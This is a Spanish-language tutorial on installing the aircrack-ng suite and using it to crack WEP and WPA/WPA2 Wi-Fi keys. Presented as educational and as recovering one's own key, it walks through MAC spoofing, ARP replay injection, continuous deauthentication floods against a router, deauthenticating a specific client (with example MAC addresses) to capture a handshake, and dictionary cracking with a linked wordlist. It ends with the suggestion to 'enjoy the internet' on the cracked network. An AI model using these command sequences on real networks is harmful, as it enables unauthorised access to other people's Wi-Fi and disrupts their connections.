You are on page 1of 20

TUTORIAL DE AIRCRACK-NG

Paolo Norambuena
Estudiante Ingeniera (e)
en Computacin e Informtica
Universidad del Bo-Bo, Concepcin.
Tutorial de Aircrack-ng by Paolo Norambuena is licensed under a Creative
Commons Atribucin-No Comercial-Licenciar Igual 2.0 Chile License.
Tutorial de Aircrack-ng by Paolo Norambuena is licensed under a Creative
Commons Atribucin-No Comercial-Licenciar Igual 2.0 Chile License.
AIRCRACK-NG
Esta es una gua con fines educativos para el uso y manipulacin de Aircrack-ng
sobre las distintas distribuciones de Linux. Se explicar desde su instalacin en
sistemas como Mandriva, Ubuntu, Debian, OpenSuse y SlackWare para que
posteriormente no existan dudas sobre ninguna distribucin.
En primer lugar debemos tener instalado en nuestro sistema el Driver del
Fabricante de nuestra tarjeta de red, aircrack-ng no funciona con drivers
emulados por ndiswrapper.
Instalando Aircrack-ng
En este apartado instalaremos aircrack-ng en las distintas distribuciones
comenzando por Ubuntu.
Ubuntu.
$ sudo apt-get install aircrack-ng
Mandriva
# urpmi aircrack-ng
OpenSUSE
Descargar:
ftp://ftp.pbone.net/mirror/packman.iu-bremen.de/suse/11.0/SRPMS/aircrack-ng-1.0rc3-
0.pm.1.nosrc.rpm
Instalar haciendo Doble Click al paquete una vez descargado.
SlackWare
Descargar
http://repository.slacky.eu/slackware-12.2/security/aircrack-ng/1.0rc3/aircrack-ng-
1.0rc3-i486-1dd.tgz
Una vez descargado por consola (terminal konsole, etc), ejecutar
# installpkg aircrack-ng-1.0rc3-i486-1dd.tgz
Paquetes complementarios.
Una vez instalado aircrack-ng puede ser necesario la instalacin de un paquete
adicional por lo cual descargaremos IW, que es un complemento para poner
nuestra tarjeta inalmbrica en modo monitor.
segn la distribucin ser necesario actualizar la librera libnl
$ sudo apt-get install libnl1* (ubuntu, debian)
# urpmi -a libnl (mandriva)
Instalada y/o actualizada la librera procedemos a descargar iw.
# wget http://wireless.kernel.org/download/iw/iw-0.9.13.tar.bz2
# tar jxvf iw-0.9.13.tar.bz2
# cd iw-0.9.13
# make
#make install
Y de esta forma ya tenemos aircrack-ng y su componente para poner en modo
monitor nuestra wireless.
Ahora solo nos queda empezar a trabajar.
Recuperando Claves.
Ahora empezamos nuestro trabajo, lo que se realiz anteriormente solo se hace
una vez, que es para instalar y configurar de buena forma nuestra suite, lo que se
realiza siempre es lo que a continuacin se detalla.
Para quienes creen que cambiar su mac es necesario, pueden hacerlo asi
Mandriva :
# ifconfig (wlan0, eth1, etc) down
# ifconfig (wlan0, eth1, etc) hw ether 00:11:22:33:44:55
# ifconfig (wlan0, eth1, etc) up
Debian / Ubuntu :
$ sudo ifconfig (wlan0, eth1, etc) down
$ sudo ifconfig (wlan0, eth1, etc) hw ether 00:11:22:33:44:55
$ sudo ifconfig (wlan0, eth1, etc) up
Slackware :
# ifconfig (wlan0, eth1, etc) down
# ifconfig (wlan0, eth1, etc) hw ether 00:11:22:33:44:55
# /etc/rc.d/rc.inet1 (wlan0, eth1, etc) start
IMPORTANTE: Las direcciones mac SIEMPRE deben iniciar con 00
Para saber cual es nuestra MAC debemos ejecutar
#ifconfig (wlan0, eth1, etc) | grep Hwaddr
De la vista anterior podemos sacar nuestra direccin mac de HWaddr la serie
numerica que acompaa la instruccin antes destacada es nuestra direccin,
que utilizaremos desde ahora en adelante.
Airmon-ng.
Airmon-ng es parte de la suite de aircrack-ng la cual permite crear la
interfaz mon0 en modo monitor. Su utilizacin es la siguiente
# airmon-ng start (wlan0, eth1, etc)
En caso de que nos muestre un error podemos utilizar iw que instalamos
anteriormente.
# iw dev wlan0 interface add mon0 type monitor
Y con esto ya tenemos el primer paso completo.
Airodump-ng
# airodump-ng mon0
De esta forma veremos todas las redes disponibles con sus respectivos canales,
una vez que ya encontramos nuestra red creamos un filtro con el canal de
trabajo, en este caso canal 6 (columna CH), paramos la ejecucin de airodump-
ng presionando Ctrl + C, y posteriormente ejecutamos:
-c = Filtro de canal 6, 11, 1, etc.
-w = Escribir resultados en un documento.
# airodump-ng -c 6 -w nombre mon0
De esta forma hemos creado un filtro que solo trabajar en el canal indicado (6).
Nuestra red es Jimmy
Aireplay-Ng
Una vez que airodump-ng ya est trabajando, abrimos una nueva consola donde
empezaremos a trabajar con aireplay-ng.
Lo primero que debemos hacer con aireplay-ng es asociarnos a la red.
#aireplay-ng -1 6000 -q 10 -o 1 -e (ESSID Router) -a (Mac Router) -h (nuestra mac)
mon0
Donde :
-1 6000 = Autentificar cada 6000 segundos.
-q 10 = Intervalo de tiempo en que enviar un paquete Keep Alive
-o 1 = Cantidad de paquetes keep allive que enviar
Creo que muchos se pueden preguntar, de donde obtengo el ESSID y la Mac del
Router?. Bueno, si recordamos en la consola anterior ejecutamos airodump-ng, de
esa pantalla encontramos las columnas BSSID y ESSID que corresponden a la mac
y la ESSID o nombre del router respectivamente.
De esta forma estaremos asociados a la red la cual cada 10 segundos aireplay-ng
mandar un paquete llamado KEEP-ALIVE, lo que avisar al router que seguimos
asociados y asi no nos botar a cada rato.
Ya asociados procedemos a enviar y capturar paquetes, para eso en una nueva
consola ejecutaremos nuevamente aireplay-ng pero en modo agresivo.
#aireplay-ng -3 -b (Mac del router) -h (nuestra mac) mon0
De la imagen anterior lo que nos interesa es que aumenten los ARP, ya que son
esos los paquetes capturados y los que adems nos entregarn la clave buscada.
Una vez que tenemos desde 150.000 paquetes capturados empezamos a trabajar
con aircrack-ng.
Nunca est dems recordar que mientras mas paquetes capturados, es mucho
mejor, ya que ms pronto obtendremos la clave.
En caso de que este ataque no capture paquetes ARP o que en mucho tiempo
hayamos capturado pocos paquetes, podemos realizar un Ataque DoS
(Denegacin de Servicios). Para realizar este ataque es necesario simplemente
saber la direccin Mac del Router, dato que por lo dems, hemos utilizado para
cada accin con aircrack-ng y sus componentes.
Ahora Como realizamos el ataque DoS con aircrack-ng?
R: // #aireplay-ng -0 0 -a (Mac Router) mon0
Con eso ya estaramos acelerando la transferencia y captura de paquetes.
Aircrack-Ng
Ya estamos en el paso final, con los paquetes de datos capturados
procedemos a ejecutar aircrack-ng, para lo cual tenemos dos formas, una lenta
pero efectiva, y una rpida pero se necesita una mayor cantidad de paquetes
para desencriptar la clave.
Forma lenta
#aircrack-ng *.cap
Forma Rpida (se necesita mayor cantidad de paquetes capturados)
#aircrack-ng -z *.cap
De esta forma ya hemos desencriptado la clave que buscabamos, solo nos
queda hacer configurar la clave en el cliente de conexin para eso solo tienen
que borrar los dos puntos ( : ) que hay entre cada par de caracteres, ahora a
disfrutar de internet.
Recordatorio.
Al finalizar este tutorial, cabe recordar que la distancia afecta nuestro trabajo,
si estamos muy lejos de la red a atacar la transferencia y captura de paquetes
ser muy lenta llegando incluso a ser nula. Por lo cual es recomendable estar a
una distancia prudente para poder realizar la captura de forma rpida.
Los drivers para las tarjetas inalambricas deben ser los propietarios, no se puede
realizar por emulacin de drivers, en este caso con ndiswrapper, por ejemplo.
Las acciones deben ser ejecutadas como Super Usuario (root) en los sistemas
que lo permitan, en caso de Ubuntu, se debe ejecutar con sudo.
Las direcciones mac SIEMPRE deben iniciar con 00 en caso de que las
cambien en forma manual.
Si no aireplay-ng no inyecta ni captura paquetes, realizamos un ataque DoS
con aireplay #aireplay-ng -0 0 -a (Mac Router) mon0
Todo lo que tenga # en Ubuntu se debe ejecutar con sudo.
Finalizando.
Espero que este tutorial sea de utilidad para cada persona que lo lea. Este tutorial
est enfocado en una forma de ataque, en aircrack-ng existen muchos otros
mtodos, algunos ms complicados que otros, pero la idea es aprender y adoptar
la forma ms cmoda para cada uno.
Agradecimientos Anbal Chavo Zapata, por la instruccin de ataque DoS.
Informacin recopilada de distintos sitios de internet, especialmente de
http://www.aircrack-ng.org/doku.php sitio oficial de Aircrack-ng.
En caso de duda, contactar a wjotta@gmail.com
Tutorial de Aircrack-ng by Paolo Norambuena is licensed under a Creative
Commons Atribucin-No Comercial-Licenciar Igual 2.0 Chile License.
Parte 2 :
Recuperando
Claves
WPA/WPA2 Con
Aircrack-ng
Introduccin.
De seguro muchos se han preguntado, como poder recuperar la clave
wpa/wpa2 de mi router sin tener que resetearlo?, bueno al igual que antes, la
respuesta es con aircrack-ng.
En esta seccin se demostrar como en unos pocos pasos se puede obtener la
clave en forma rpida, los ingredientes para recuperar estas claves son :
Equipo con tarjeta inalambrica.
Distro de Linux Instalada o Live CD.
Suite Aircrack-NG instalada (se detallo en la primera parte).
Diccionario de palabras.
Saber la direccin MAC de nuestra tarjeta (se vio en la seccin anterior)
airmon-ng
Comenzando con esta parte debemos poner nuestra tarjeta en modo monitor
# airmon-ng start (wlan0, eth1, etc)
En caso de que nos muestre un error podemos utilizar iw que instalamos
anteriormente.
# iw dev wlan0 interface add mon0 type monitor
Y con esto ya tenemos el primer paso completo.
Airodump-ng
#airodump-ng -c (numero de canal) -w (nombre archivo) mon0
As estamos escaneando las redes existentes en un solo canal, esta consola debe
seguir trabajando sin ser detenida.
De esta pantalla necesitaremos los siguientes datos con los cuales trabajaremos el
resto del tutorial.
Nombre del Router (ESSID) : wifi-ubb
Mac del Router (BSSID) : 00:1A:70:EE:5E:D6
Direccin MAC de un cliente : 00:16:44:A2:40:D4
Aireplay-ng
Ya tenemos los datos necesarios y airodump-ng sigue en funcionamiento, por lo
cual ahora es el turno de aireplay-ng.
En una nueva consola ejecutamos :
# aireplay-ng -0 1 -a 00:1A:70:EE:5E:D6 -c 00:16:44:A2:40:D4 mon0
donde tenemos
-0 : deautenticacin
1 : es el nmero de deautenticaciones enviadas (puedes enviar infinitas si se
deseas. Para infinito es 0)
-a : es la direccin MAC del punto de acceso o Router
-c : es la direccin MAC del cliente que queremos deautenticar
De esta forma estamos capturando el handshake que necesitamos para
desencriptar la clave.
Una vez que se ha captura el handshake ejecutamos aircrack-ng para su
desencriptacin.
Para aircrack las instrucciones son las siguientes
# aircrack-ng -w diccionario -b 00:1A:70:EE:5E:D6 *.cap
Y posteriormente, obtendremos nuestra clave con una salida como esta
Recomendaciones.
Para trabajar con claves tipo WPA/WPA2 es necesario poder contar con un buen
diccionario de palabras, ya que el trabajo de aircrack-ng es ir comparando el
handshake con cada una de las palabras del diccionario que tenemos.
Pueden descargar un diccionario de palabras desde aqu
http://wjota.uuuq.com/tutoriales/diccionario.zip
Que es el diccionario que se utiliz para el ejemplo, y puede ser modificado,
agregando o quitando palabras.
Tutorial de Aircrack-ng by Paolo Norambuena is licensed under a Creative
Commons Atribucin-No Comercial-Licenciar Igual 2.0 Chile License.

You might also like